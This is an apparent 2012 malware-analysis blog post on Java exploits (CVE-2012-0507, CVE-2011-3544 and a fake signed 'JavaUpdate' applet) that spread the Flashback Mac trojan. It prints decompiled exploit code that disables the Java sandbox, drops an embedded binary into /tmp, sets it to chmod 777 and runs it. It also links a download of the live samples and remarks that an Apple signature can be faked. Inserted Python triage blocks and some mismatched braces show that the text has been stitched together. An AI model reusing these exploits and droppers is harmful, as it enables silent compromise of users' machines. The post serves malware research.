
Monday, April 16, 2012

Java OSX CVE-2012-0507, CVE-2011-3544 and Flashback.35/J sample




Dr. Web published a BackDoor.Flashback.39 (Flashback.K, the 11th variant) epidemic chronology to augment their discovery of the Mac botnet, "Doctor Web exposes 550 000 strong Mac botnet". In general, the Flashback OSX epidemic started on or before August 2011 (F-Secure), with variants distributed as a fake Adobe Flash player. In January 2012, Intego reported Flashback.35/J (the 10th variant), which was also distributed as a fake Flash download.

I am posting here 3 Java exploits used to distribute Flashback trojans:

SAMPLE 1 is JAVA CVE-2012-0507. It is dated April 4 and appears to be distributing Flashback.35/J, as seen from the payload.
SAMPLE 2 is a java_signed_applet social engineering exploit (see Michael Schierl's comment below).
SAMPLE 3 is JAVA CVE-2011-3544. Samples 2 and 3 are dated February 2012.


I don't know which domains distributed these exploits (let me know if you do), but perhaps we are seeing the malware distribution scheme common for Windows-targeting exploit packs.




File information


JAVA CVE-2012-0507 with Flashback.35/J payload


MD5:  0bb60cde26e022b8044149f7da138c1f
Size: 25891
 
JAVA 2011-3544

MD5:  d9d193658ea1555124854c3c827e4391
Size: 20989

JAVA 2011-3544

MD5:  b134edeacd2660fa08f2f5a2ea916512
Size: 45797


Download

Download all files listed above (email me if you need the password scheme), with many thanks for the anonymous donation.



Malware information


SAMPLE 1
JAVA CVE-2012-0507
MD5:  0BB60CDE26E022B8044149F7DA138C1F (Virustotal)
First seen by Virustotal: 2012-04-02 13:12:35 UTC (2 weeks ago)

apl.class Virustotal
{} are replaced by [] to prevent issues with Blogger page saving and posting, and with AV alerts

// Source File Name:   apl.java

package a;

import java.applet.Applet;
import java.io.*;
import java.util.concurrent.atomic.AtomicReferenceArray;

// Referenced classes of package a:
//            Help

public class apl extends Applet
[

    public apl()
    [
        sobj = "8BCA2722525527347C6B4D465146094B4649400968454D4244531CB7E97FB837540E4B2527275F57272727255255272E7C6B46096F424B571CD90BB336AF91C2D82527275F572727272657545527174D4651460952534E4B0944484944525555424953094653484A4E44096653484A4E44754241425542494442665555465E8EF5F9869942472B2527267C2722465555465E5327347C6B4D465146084B4649400868454D4244531C5F575627592724";
    ]

    public void init()
    [
        try
        [
            byte binary[] = loadFileFromResources("/xnm");
            byte arrayOfByte[] = StringToBytes(sobj);
            for(int i = 0; i < arrayOfByte.length; i++)
                arrayOfByte[i] = (byte)(arrayOfByte[i] ^ 0x27);

            ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(arrayOfByte));
            Object arrayOfObject[] = (Object[])(Object[])localObjectInputStream.readObject();
            Help arrayOfHelp[] = (Help[])(Help[])arrayOfObject[0];
            AtomicReferenceArray localAtomicReferenceArray = (AtomicReferenceArray)arrayOfObject[1];
            ClassLoader localClassLoader = getClass().getClassLoader();
            localAtomicReferenceArray.set(0, localClassLoader);
            Help.go(arrayOfHelp[0], binary);
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private static byte[] StringToBytes(String s)
    [
        byte data[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
            data[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

        return data;
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);

        fin.close();
        return bout.toByteArray();
    ]

    public static void main(String args[])
    [
        apl v = new apl();
        v.init();
    ]

    private String sobj;
]
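
An added example, not part of the original post or of the sample: a static triage of the `sobj` string from apl.class. It undoes the hex and XOR 0x27 layers seen in init(), parses the resulting Java serialization stream without deserializing it, and reports the AtomicReferenceArray whose backing array is a back-reference to the a.Help[] array earlier in the same stream. `decode`, `StreamParser` and `aliased_array_fields` are names made up for this example, and the parser handles only the grammar subset this stream uses.

```python
import struct

SOBJ_HEX = (  # copied from the `sobj` field of apl.class as shown on this page
    "8BCA2722525527347C6B4D465146094B4649400968454D4244531CB7E97FB837540E4B"
    "2527275F57272727255255272E7C6B46096F424B571CD90BB336AF91C2D8"
    "2527275F572727272657545527174D4651460952534E4B0944484944525555424953"
    "094653484A4E44096653484A4E44754241425542494442665555465E"
    "8EF5F9869942472B2527267C2722465555465E5327347C6B4D465146084B4649400868"
    "454D4244531C5F575627592724"
)
XOR_KEY = 0x27                   # constant used in apl.init()
MAGIC = b"\xac\xed\x00\x05"      # Java serialization stream magic and version
BASE_HANDLE = 0x7E0000           # first back-reference handle in the protocol
TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT = 0x70, 0x71, 0x72, 0x73
TC_STRING, TC_ARRAY, TC_ENDBLOCKDATA = 0x74, 0x75, 0x78


def decode(hex_text, key=XOR_KEY):
    """Undo the hex and single-byte XOR layers; nothing is deserialized."""
    return bytes(b ^ key for b in bytes.fromhex(hex_text))


class StreamParser:
    """Reads only the grammar subset this sample uses: object arrays, objects
    with reference-typed fields, strings, nulls and back-references."""

    def __init__(self, data):
        if data[:4] != MAGIC:
            raise ValueError("not a Java serialization stream")
        self.data, self.pos, self.handles = data, 4, []

    def take(self, fmt):
        (value,) = struct.unpack_from(fmt, self.data, self.pos)
        self.pos += struct.calcsize(fmt)
        return value

    def utf(self):
        size = self.take(">H")
        self.pos += size
        return self.data[self.pos - size:self.pos].decode("utf-8")

    def class_desc(self):
        desc = {"name": self.utf(), "fields": []}
        self.take(">q")                          # serialVersionUID
        self.handles.append(desc)
        if self.take(">B") != 0x02:              # plain SC_SERIALIZABLE only
            raise ValueError("class flags outside the handled subset")
        for _ in range(self.take(">H")):
            typecode, field = chr(self.take(">B")), self.utf()
            if typecode not in "[L":
                raise ValueError("primitive field outside the handled subset")
            desc["fields"].append((field, self.content()))  # declared type
        if self.take(">B") != TC_ENDBLOCKDATA or self.content() is not None:
            raise ValueError("annotation or superclass outside the subset")
        return desc

    def content(self):
        tc = self.take(">B")
        if tc == TC_NULL:
            return None
        if tc == TC_REFERENCE:
            return self.handles[self.take(">I") - BASE_HANDLE]
        if tc == TC_STRING:
            self.handles.append(self.utf())
            return self.handles[-1]
        if tc == TC_CLASSDESC:
            return self.class_desc()
        if tc not in (TC_ARRAY, TC_OBJECT):
            raise ValueError("type code 0x%02x outside the handled subset" % tc)
        desc = self.content()                    # class descriptor comes first
        node = dict(array=tc == TC_ARRAY, type=desc["name"], fields=[], items=[])
        self.handles.append(node)
        if tc == TC_ARRAY:
            if desc["name"][1] not in "[L":
                raise ValueError("primitive array outside the handled subset")
            node["items"] = [self.content() for _ in range(self.take(">i"))]
        for field, declared in (desc["fields"] if tc == TC_OBJECT else []):
            by_ref = self.data[self.pos] == TC_REFERENCE
            node["fields"].append((field, declared, by_ref, self.content()))
        return node


def aliased_array_fields(hex_text):
    """Return (holder class, field, declared type, actual array class) for each
    object field that back-references an array of a different class."""
    findings, seen = [], set()
    stack = [StreamParser(decode(hex_text)).content()]
    while stack:
        node = stack.pop()
        if not isinstance(node, dict) or "array" not in node or id(node) in seen:
            continue
        seen.add(id(node))
        stack.extend(node["items"])
        for field, declared, by_ref, value in node["fields"]:
            stack.append(value)
            if (by_ref and isinstance(value, dict) and value.get("array")
                    and value["type"] != declared.replace("/", ".")):
                findings.append((node["type"], field, declared, value["type"]))
    return findings
```
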

Help.class Virustotal

// Source File Name:   Help.java

package a;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Help extends ClassLoader
[

    public Help()
    [
    ]

    public static void go(Help paramHelp, byte param[])
    [
        try
        [
            byte arrayOfByte[] = zn_data;
            URL localURL = new URL("file://");
            Certificate arrayOfCertificate[] = new Certificate[0];
            Permissions localPermissions = new Permissions();
            localPermissions.add(new AllPermission());
            ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
            Class localClass = paramHelp.defineClass("a.Time", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
            Constructor x[] = localClass.getConstructors();
            Object objlist[] = new Object[1];
            objlist[0] = param;
            Object znobj = x[1].newInstance(new Object[] [
                param
            ]);
        ]
        catch(Exception localException)
        [
            localException.printStackTrace();
        ]
    ]

Flashback.J /  BackDoor.Flashback.35 that is being dropped by the applet
File: xnm
MD5:  AE7BBF2410B0EFD0CBF1410EA41E07C6
Strings (example taken from x64 binary)
 --------------------------------------------------------------------------
__PAGEZERO
__TEXT
__text
__TEXT
__symbol_stub1
__TEXT
__stub_helper
__TEXT
__cstring
__TEXT
__unwind_info
__TEXT
__eh_frame
__TEXT
__DATA
__nl_symbol_ptr
__DATA
__la_symbol_ptr
__DATA
__dyld
__DATA
__const
__DATA
__cfstring
__DATA
__data
__DATA
__common
__DATA
__LINKEDIT
/usr/lib/dyld
/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
/usr/lib/libz.1.dylib
/usr/lib/libcrypto.0.9.7.dylib
/System/Library/Frameworks/Security.framework/Versions/A/Security
/usr/lib/libgcc_s.1.dylib
/usr/lib/libSystem.B.dylib
/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
HOME
User-Agent
/bin/sh
system.privilege.admin
prompt
icon
%s%s
%s "%s%s%s" %s "%s"
%s %s "%s"
sysctl.proc_cputype
dFd1js
IOPlatformUUID
%s|%s|%s|%s|%s|%s|%d
none
x86_64
i386



=========================================================================
SAMPLE 2
java_signed_applet social engineering exploit (see Michael Schierl's comment below)
MD5:  d9d193658ea1555124854c3c827e4391 (Virustotal)
First seen by VirusTotal: 2012-02-10 09:01:38 UTC (2 months ago)
{} are replaced by [] to prevent issues with Blogger page saving and posting, and with AV alerts
JavaUpdate.class  Virustotal
// Source File Name:   JavaUpdate.java

package javaupdate;

import java.applet.Applet;
import java.security.AccessController;

// Referenced classes of package javaupdate:
//            Payload

public class JavaUpdate extends Applet
[

    public JavaUpdate()
    [
    ]

    public void init()
    [
        Boolean boolean1 = (Boolean)AccessController.doPrivileged(new Payload());
    ]

    public static void main(String args[])
    [
        AccessController.doPrivileged(new Payload());
    ]
]



Payload.class  Virustotal
// Source File Name:   Payload.java

package javaupdate;

import java.io.*;
import java.security.PrivilegedAction;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;

class Payload
    implements PrivilegedAction
[

    Payload()
    [
    ]

    private void saveFile(String s, byte abyte0[])
        throws IOException
    [
        FileOutputStream fileoutputstream = new FileOutputStream(s);
        fileoutputstream.write(abyte0);
        fileoutputstream.close();
    ]

    private byte[] loadFileFromResources(String s)
        throws IOException
    [
        InputStream inputstream = getClass().getResourceAsStream(s);
        byte abyte0[] = new byte[0x4b000];
        ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
        for(int i = inputstream.read(abyte0); 0 < i; i = inputstream.read(abyte0))
            bytearrayoutputstream.write(abyte0, 0, i);

        inputstream.close();
        return bytearrayoutputstream.toByteArray();
    ]

    public Object run()
    [
        try
         [
            Inflater inflater = new Inflater();
            inflater.setInput(loader_data);
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(loader_data.length);
            byte abyte0[] = new byte[1024];
            while(!inflater.finished())
                try
                [
                    int i = inflater.inflate(abyte0);
                    bytearrayoutputstream.write(abyte0, 0, i);
                ]
                catch(DataFormatException dataformatexception) { }
            bytearrayoutputstream.close();
            byte abyte1[] = bytearrayoutputstream.toByteArray();
            saveFile(dropFile, abyte1);
            String as[] = {
                "chmod", "777", dropFile
            ];
            Process process = Runtime.getRuntime().exec(as);
            int j = process.waitFor();
            String as1[] = {
                "nohup", dropFile, "&"
            ];
            Process process1 = Runtime.getRuntime().exec(as1);
            int k = process1.waitFor();
        ]
        catch(Exception exception)
        [
            exception.printStackTrace();
            return Boolean.valueOf(false);
        }
        return Boolean.valueOf(true);
    }

    byte loader_data[] = {
        -26, 79, -14, 6, -108, -73, 85, -92, 35, 25,
        -18, 64, 121, 59, -51, 31, 101, -58, -66, -54,
        49, 9, -87, 120, 4, 102, -56, 45, -70, -33,
        1, 49, 125, 50, 33, 35, -13, 88, 4, 9,
        -66, -107, 115, -4, 39, 38, -37, -101, -33, 47,
        -125, -124, 31, -46, 35, 96, -93, 55, 33, 29,
        -81, -32, 127, -49, -52, -124, 63, -62, -26, 64,
        90, 50, -115, -5, -31, -73, 67, 82, 32, -35,
        5, -23, 30, 72, 15, 67, 122, 2, -46, 126,
        72, 71, -89, 113, 95, -5, 15, 32, 89, -32,
        111, -37, 73, -112, 102, 66, -102, 3, 105, 9,
        -92, -107, -112, -38, 33, 41, -45, -71, 79, -5,
        61, -112, 30, -122, -12, 4, -92, -3, -112, -114,
        66, 122, 107, 122, -31, -17, 25, -12, -119, 63,
        -83, -5, -1, 118, 40, 127, 60, 61, -29, 59,
        -113, -14, -59, 51, -14, -8, -54, -61, -4, -74,
        66, -39, -33, -52, -56, -8, -60, -29, -33, 91,
        21, -107, -26, 119, -94, 73, 38, -103, 100, -110,
        73, 38, -103, 100, -110, 73, 38, -103, 100, -110,
        73, -1, -9, 41, -113, -1, -1, 14, 41, 111,
        0, -128, -14, 3, 41, 79, 12, -64, -128, -108,
        35, 8, -96, -73, -4, -36, -126, 0, -84, 67,
        -106, -14, 124, 49, 0, 15, 72, 3, -54, -44,
        49, -3, -1, 43, -50, -47, -1, -33, 126, -114,
        -2, -1, -77, -13, -8, -1, 95, -109, -57, -1,
        -65, -38, -24, -1, 63, 111, 44, -1, -1, -38,
        -68, -2, -1, -117, 10, -7, -1, -41, -27, -10,
        -1, -81, 63, 55, -9, 127, 87, 97, -17, 127,
        119, 1, -25, -1, -26, 108, -33, -1, -42, 60,
        -82, -1, 107, 82, -98, -1, -10, -74, -27, -115,
        107, -26, 84, 87, -49, 69, 116, -83, 46, 2,
        96, 93, 86, 0, 64, -121, -34, -1, -33, -97,
        118, -1, -49, 106, 29, -52, 10, 3, 8, 103,
        69, 1, -88, 89, 65, 0, 61, -58, 24, -128,
        45, -122, 16, -128, 94, 67, 8, -64, 86, 73,
        31, 2, 32, -91, 67, 0, -78, -6, -33, 46,
        25, 98, 1, -2, -105, -30, 0, 122, 116, 113,
        0, -23, 24, 0, 91, -74, -1, -65, -34, -9,
        95, -17, -9, -81, -9, -7, -41, -5, -5, -21,
        125, -3, -11, 126, -2, 122, 31, 127, -67, 127,
        -65, -34, -73, 95, -17, -41, -81, -9, -23, -41,
        -5, -13, -21, 125, -7, -11, 126, -4, 122, 31,
        126, -67, -1, -66, -34, 119, -1, 113, -35, -11,
        -49, 117, -41, -49, -24, -82, 15, -24, -82, -113,
        -23, -6, 74, -24, 124, -12, -49, -24, -4, -13,
        39, -23, 124, -29, 47, -45, 93, -49, -44, 93,
        95, -83, -69, -98, -81, -69, -2, -122, -18, -38,
        -91, -69, 94, -82, -69, -10, -24, -82, 55, -24,
        -4, -18, -15, 55, -51, 9, -116, -107, -17, 17,
        -7, -80, -56, -65, 8, 63, -9, 47, -94, 79,
        -12, -17, 79, -7, -10, 95, -54, -105, 115, -99,
        72, -90, -49, -3, -105, -36, -25, 62, -13, -14,
        43, -28, 124, -81, -85, -11, 69, 123, -31, -21,
        -122, 114, -82, -18, -8, -1, 13, -72, 48, -16,
        12
    ];
    private static String dropFile = "/tmp/.sysenter";

]


JAR signature files carrying Apple information: DSA and SF files. I think it is something you can fake - "use the JAR Signing and Verification Tool to sign JAR files"

File: SUNMS.SF
Strings
Signature-Version: 1.0
SHA1-Digest-Manifest-Main-Attributes: fPlIJrwM0qYddN2iT3wv1BXlT9s=
Created-By: 1.6.0_17 (Apple Inc.)
SHA1-Digest-Manifest: h1REtbMLPS/h4zSUFRfF4WfRv7g=
Name: javaupdate/JavaUpdate.class
SHA1-Digest: f+I4wjROuXtwlvNBuO9QqMeJIqU=
Name: javaupdate/Payload.class
SHA1-Digest: asgEt/q0WVR8JnKO4gSmSgm+Tao=

File: SUNMS.DSA

Strings
 -Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
120206180202Z
120506180202Z0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.0
Q&iE]@"Q
gQYW
{U%d
staQ_&
0u0m1
Cupertino1
Apple Inc.1
Apple Inc.1
Apple Inc.
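
What the digests in a .SF file like the one above do and do not establish, as an added example (not from the original post or the samples): it parses the manifest format and checks the chain .SF -> MANIFEST.MF -> entries on a constructed in-memory JAR. The entry name `demo/A.class`, the helper names and the SHA1-only handling are assumptions of this sketch; the signature block (.DSA) is not verified here.

```python
import base64
import hashlib
import io
import zipfile


def b64sha1(data):
    return base64.b64encode(hashlib.sha1(data).digest()).decode()


def parse_sections(text):
    """Split manifest-format text into a list of {header: value} sections."""
    sections, current, last = [], {}, None
    for line in text.replace("\r\n", "\n").split("\n"):
        if not line:                           # a blank line ends a section
            if current:
                sections.append(current)
            current, last = {}, None
        elif line.startswith(" ") and last:    # continuation of a wrapped value
            current[last] += line[1:]
        else:
            last, _, value = line.partition(": ")
            current[last] = value
    if current:
        sections.append(current)
    return sections


def check_jar(jar_bytes):
    """Check the digest chain .SF -> MANIFEST.MF -> entries (integrity only).

    Assumption: only SHA1-Digest headers are handled, as in the dump above."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        manifest_raw = jar.read("META-INF/MANIFEST.MF")
        report = {"sf_matches_manifest": None, "created_by": None, "bad_entries": []}
        for section in parse_sections(manifest_raw.decode("utf-8"))[1:]:
            name, want = section.get("Name"), section.get("SHA1-Digest")
            if name and (name not in names or want != b64sha1(jar.read(name))):
                report["bad_entries"].append(name)
        for sf in sorted(n for n in names if n.startswith("META-INF/") and n.endswith(".SF")):
            main = parse_sections(jar.read(sf).decode("utf-8"))[0]
            report["created_by"] = main.get("Created-By")
            report["sf_matches_manifest"] = (
                main.get("SHA1-Digest-Manifest") == b64sha1(manifest_raw))
    return report


def build_sample(created_by, tamper=False):
    """Constructed sample: in-memory JAR with a manifest and .SF, no signature block."""
    body = b"constructed class bytes"
    manifest = ("Manifest-Version: 1.0\r\n\r\nName: demo/A.class\r\n"
                "SHA1-Digest: %s\r\n\r\n" % b64sha1(body)).encode()
    sf = ("Signature-Version: 1.0\r\nCreated-By: %s\r\n"
          "SHA1-Digest-Manifest: %s\r\n\r\n" % (created_by, b64sha1(manifest))).encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", manifest)
        jar.writestr("META-INF/SUNMS.SF", sf)
        jar.writestr("demo/A.class", body + (b"!" if tamper else b""))
    return buf.getvalue()
```

A clean result only means the archive matches what its signer digested; `Created-By` and the certificate subject are text the signer chose, so identity rests on the certificate chain that `jarsigner -verify -certs` reports.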

=========================================================================
SAMPLE 3 Virustotal
JAVA CVE-2011-3544
MD5:  B134EDEACD2660FA08F2F5A2EA916512
First seen by VirusTotal 2012-02-09 09:57:50 UTC ( 2 months, 1 week ago )
rhcls.java Virustotal
{} are replaced by [] to prevent issues with blogger page saving posting and AV alerts

// Source File Name:   rhcls.java

import java.applet.Applet;
import java.io.*;
import java.util.zip.DataFormatException;
import java.util.zip.Inflater;
import javax.script.*;
import javax.swing.JList;

public class rhcls extends Applet
[

    public rhcls()
    [
        ldr_data = new byte[11803];
    ]

    public void init0()
    [
        ldr_data[0] = 120;
        ldr_data[1] = -38;
       
        ldr_data[65] = 31;
        ldr_data[66] = 109;
        ldr_data[67] = -79;
-------------------------------------REDACTED TO SHORTEN--------------------------       
        ldr_data[11801] = -122;
        ldr_data[11802] = -89;
    ]

    public void init()
    [
        try
        [
            ScriptEngine engine = (new ScriptEngineManager()).getEngineByName("js");
            Bindings b = engine.createBindings();
            b.put("applet", this);
            Object proxy = engine.eval("this.toString = function() [\tjava.lang.System.setSecurityManager(null);\tapplet.callBack();\treturn String.fromCharCode(97 + Math.round(Math.random() * 25));];e = new Error();e.message = this;e", b);
            JList list = new JList(new Object[] [
                proxy
            ]);
            add(list);
        ]
        catch(ScriptException e)
        [
            e.printStackTrace();
        ]
    ]

    public void callBack()
    [
        try
        [
            init0();
            init1();
            init2();
            init3();
            init4();
            init5();
            init6();
            init7();
            init8();
            init9();
            init10();
            init11();
            Inflater decompressor = new Inflater();
            decompressor.setInput(ldr_data);
            ByteArrayOutputStream bos = new ByteArrayOutputStream(ldr_data.length);
            byte buf[] = new byte[1024];
            while(!decompressor.finished())
                try
                [
                    int count = decompressor.inflate(buf);
                    bos.write(buf, 0, count);
                ]
                catch(DataFormatException e) [ ]
            bos.close();
            byte decompressedData[] = bos.toByteArray();
            saveFile(dropFile, decompressedData);
            String params[] = [
                "chmod", "777", dropFile
            ];
            Process p = Runtime.getRuntime().exec(params);
            int val = p.waitFor();
            String paramstwo[] = [
                "nohup", dropFile, "&"
            ];
            Process p2 = Runtime.getRuntime().exec(paramstwo);
            int valtwo = p2.waitFor();
        ]
        catch(Exception ex)
        [
            ex.printStackTrace();
        ]
    ]

    private void saveFile(String fileName, byte content[])
        throws IOException
    [
        OutputStream os = new FileOutputStream(fileName);
        os.write(content);
        os.close();
    ]

    private byte[] loadFileFromResources(String fileName)
        throws IOException
    [
        InputStream fin = getClass().getResourceAsStream(fileName);
        byte readBuf[] = new byte[0x4b000];
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        for(int readCnt = fin.read(readBuf); 0 < readCnt; readCnt = fin.read(readBuf))
            bout.write(readBuf, 0, readCnt);

        fin.close();
        return bout.toByteArray();
    ]

    private static String dropFile = "/tmp/.sysenterxx";
    byte ldr_data[];

]
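
Static recovery of an embedded payload such as `ldr_data` from the decompiled listing, without running the applet, as an added example (not part of the original post): it rebuilds the signed Java bytes, checks for the zlib header (`120, -38` is `78 DA`), inflates with a size cap and hashes the result. The function names and the constructed benign sample are assumptions; a redacted listing like the one above is reported as incomplete rather than inflated.

```python
import hashlib
import re
import zlib

# Matches decompiler output such as "ldr_data[65] = 31;" (values are signed Java bytes).
ASSIGN_RE = re.compile(r"(\w+)\[(\d+)\]\s*=\s*(-?\d+)\s*;")
ALLOC_RE = re.compile(r"(\w+)\s*=\s*new\s+byte\[(\d+)\]")


def rebuild_array(source, name):
    """Rebuild a byte array from its allocation and element assignments.
    Returns (data, missing); missing lists indexes that were never assigned."""
    size = None
    for m in ALLOC_RE.finditer(source):
        if m.group(1) == name:
            size = int(m.group(2))
    values = {}
    for m in ASSIGN_RE.finditer(source):
        if m.group(1) == name:
            values[int(m.group(2))] = int(m.group(3)) & 0xFF  # signed -> unsigned
    if size is None:
        size = max(values) + 1 if values else 0
    data = bytes(values.get(i, 0) for i in range(size))
    missing = [i for i in range(size) if i not in values]
    return data, missing


def inflate_payload(data, limit=16 * 1024 * 1024):
    """Inflate a zlib stream with an output cap; trailing bytes are ignored."""
    d = zlib.decompressobj()
    out = d.decompress(data, limit)
    if d.unconsumed_tail:
        raise ValueError("inflated size exceeds limit")
    if not d.eof:
        raise ValueError("truncated or corrupt zlib stream")
    return out


def triage(source, name="ldr_data"):
    data, missing = rebuild_array(source, name)
    report = {"size": len(data), "missing": len(missing),
              "zlib_header": data[:2] in (b"\x78\x01", b"\x78\x9c", b"\x78\xda")}
    if not missing and report["zlib_header"]:
        payload = inflate_payload(data)
        report["payload_sha256"] = hashlib.sha256(payload).hexdigest()
        report["payload_magic"] = payload[:4].hex()
    return report


def to_listing(blob, name="ldr_data"):
    """Constructed test helper: render bytes the way the decompiler prints them."""
    lines = ["%s = new byte[%d];" % (name, len(blob))]
    for i, b in enumerate(blob):
        lines.append("%s[%d] = %d;" % (name, i, b - 256 if b > 127 else b))
    return "\n".join(lines)


# Constructed sample: a harmless string compressed at level 9 (header 78 DA, as on the page).
SAMPLE = to_listing(zlib.compress(b"constructed benign payload" * 4, 9))
```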


Automated scans

Virustotal
SHA256:     e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241
SHA1:     42ef0a55690a8e12949e3c6055a322d7cfcb9cd0
MD5:     0bb60cde26e022b8044149f7da138c1f
File size:     25.3 KB ( 25891 bytes )
File name:     e64949f0f505be0b027c2862daecbd4e36702f0cf27f4d9f47d06b8a3d7cd241.jar
Detection ratio:     25 / 42
Analysis date:     2012-04-17 02:55:59 UTC ( 1 minute ago )
AntiVir     EXP/2008-5353.AK.1     20120416
Antiy-AVL     Trojan/Java.Flashfake     20120416
Avast     Java:CVE-2012-0507-L [Expl]     20120417
BitDefender     Exploit.Java.CVE-2012-0507.N     20120417
ClamAV     Trojan.Flashfake-7     20120417
Comodo     UnclassifiedMalware     20120417
DrWeb     Exploit.CVE2012-0507.3     20120417
Emsisoft     Trojan-Dropper.Java.Flashfake!IK     20120417
eSafe     Win32.Trojan     20120415
eTrust-Vet     Java/CVE-2012-0507!exploit     20120417
F-Secure     Exploit.Java.CVE-2012-0507.N     20120417
Fortinet     W32/OSX_Flashfake.V!tr.dldr     20120416
GData     Exploit.Java.CVE-2012-0507.N     20120417
Ikarus     Trojan-Dropper.Java.Flashfake     20120417
Jiangmin     TrojanDropper.Java.k     20120416
Kaspersky     Trojan-Dropper.Java.Flashfake.b     20120417
McAfee     JV/Exploit-Blacole.e     20120416
McAfee-GW-Edition     OSX/Flashfake.c     20120416
Microsoft     Exploit:Java/CVE-2012-0507.D!ldr     20120416
NOD32     Java/Exploit.CVE-2008-5353.C     20120417
nProtect     Exploit.Java.CVE-2012-0507.N     20120417
Sophos     Troj/JavaDl-JI     20120417
SUPERAntiSpyware     -     20120402
Symantec     Trojan.Gen.2     20120417
TrendMicro     OSX_FLASHBACK.EV     20120416
TrendMicro-HouseCall     OSX_FLASHBACK.EV     20120416

Virustotal
SHA256:     1d24affa137a355a9963d1aba438b66753e62a00ce07d80626f399b600f1f00e
SHA1:     274a483583a965d7e3e3f518115684adf56c7e0a
MD5:     ae7bbf2410b0efd0cbf1410ea41e07c6
File size:     55.8 KB ( 57188 bytes )
File name:     xnm
File type:    OSX binary
Detection ratio:     23 / 42
Analysis date:     2012-04-17 02:47:05 UTC ( 0 minutes ago )
Antiy-AVL     Trojan/OSX.Flashfake     20120416
Avast     MacOS:Flashback-L [Drp]     20120417
BitDefender     MAC.OSX.Trojan.FlashBack.N     20120417
ClamAV     OSX.Flashback-9     20120417
Comodo     UnclassifiedMalware     20120417
DrWeb     BackDoor.Flashback.35     20120417
Emsisoft     Trojan-Downloader.OSX.Flashfake!IK     20120417
eSafe     Win32.Trojan     20120415
F-Secure     MAC.OSX.Trojan.FlashBack.N     20120417
Fortinet     W32/OSX_Flashfake.V!tr.dldr     20120416
GData     MAC.OSX.Trojan.FlashBack.N     20120417
Ikarus     Trojan-Downloader.OSX.Flashfake     20120417
Jiangmin     TrojanDownloader.OSX.p     20120416
Kaspersky     Trojan-Downloader.OSX.Flashfake.v     20120417
McAfee     OSX/Flashfake.c     20120416
McAfee-GW-Edition     OSX/Flashfake.c     20120416
Microsoft     Backdoor:MacOS_X/Flashback.F     20120416
NOD32     OSX/Flashback.J     20120417
nProtect     MAC.OSX.Trojan.FlashBack.N     20120417
Sophos     OSX/Flshplyr-B     20120417
Symantec     OSX.Flashback.K     20120417
TrendMicro     OSX_FLASHBACK.EV     20120416
TrendMicro-HouseCall     OSX_FLASHBACK.EV     20120417

Virustotal
SHA256:     8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0
SHA1:     ad716b284fef394bed3a99774bbf27c5da9e248c
MD5:     d9d193658ea1555124854c3c827e4391
File size:     20.5 KB ( 20989 bytes )
File name:     8fbf88d0478777e43438dd1edab757760fe145ac53993b2f047494016d163ff0.jar
File type:     JAR
Detection ratio:     21 / 42
Analysis date:     2012-04-16 22:54:38 UTC ( 3 hours, 56 minutes ago )
Antiy-AVL     Trojan/win32.agent     20120416
Avast     Java:Agent-ATC [Expl]     20120416
AVG     Java/Exploit.APA     20120417
BitDefender     Java.Trojan.Dropper.A     20120417
Comodo     UnclassifiedMalware     20120416
DrWeb     Java.Dropper.8     20120417
Emsisoft     Java.Trojan-Dropper!IK     20120416
eTrust-Vet     Java/Flashfake.A     20120416
F-Secure     Java.Trojan.Dropper.A     20120417
Fortinet     Java/Agent.EB     20120416
GData     Java.Trojan.Dropper.A     20120417
Ikarus     Java.Trojan-Dropper     20120416
Kaspersky     Trojan-Dropper.Java.Flashfake.a     20120416
McAfee     OSX/Flashfake     20120416
McAfee-GW-Edition     OSX/Flashfake     20120416
NOD32     Java/Agent.EB     20120416
Norman     -     20120416
nProtect     Java.Trojan.Dropper.A     20120416
Sophos     Mal/JavaKC-B     20120416
SUPERAntiSpyware     -     20120402
Symantec     OSX.Flashback     201204
TrendMicro     JAVA_DROPPR.IC     20120416
TrendMicro-HouseCall     JAVA_DROPPR.IC     20120416

Virustotal
SHA256:     ab925167124a61228d6d8f4c9b04813f5382fc2c916e29ee9bef417c7d2054b5
SHA1:     8071e88e27d9655b8c4f7c30a3e18a0bec3200f1
MD5:     b134edeacd2660fa08f2f5a2ea916512
File size:     44.7 KB ( 45797 bytes )
File name:     B134EDEACD2660FA08F2F5A2EA916512
Detection ratio:     24 / 42
Analysis date:     2012-04-17 03:04:15 UTC ( 2 minutes ago )
AntiVir     EXP/CVE-2011-3544.BC     20120416
Antiy-AVL     Exploit/Java.CVE-2011-3544     20120416
Avast     Java:CVE-2011-3544-G [Expl]     20120417
AVG     Downloader.Generic_c.DCT     20120417
BitDefender     Java.Exploit.CVE-2011-3544.A     20120417
ClamAV     CVE-2011-3544.Java     20120417
DrWeb     Exploit.CVE2011-3544.34     20120417
Emsisoft     Exploit.Java.CVE!IK     20120417
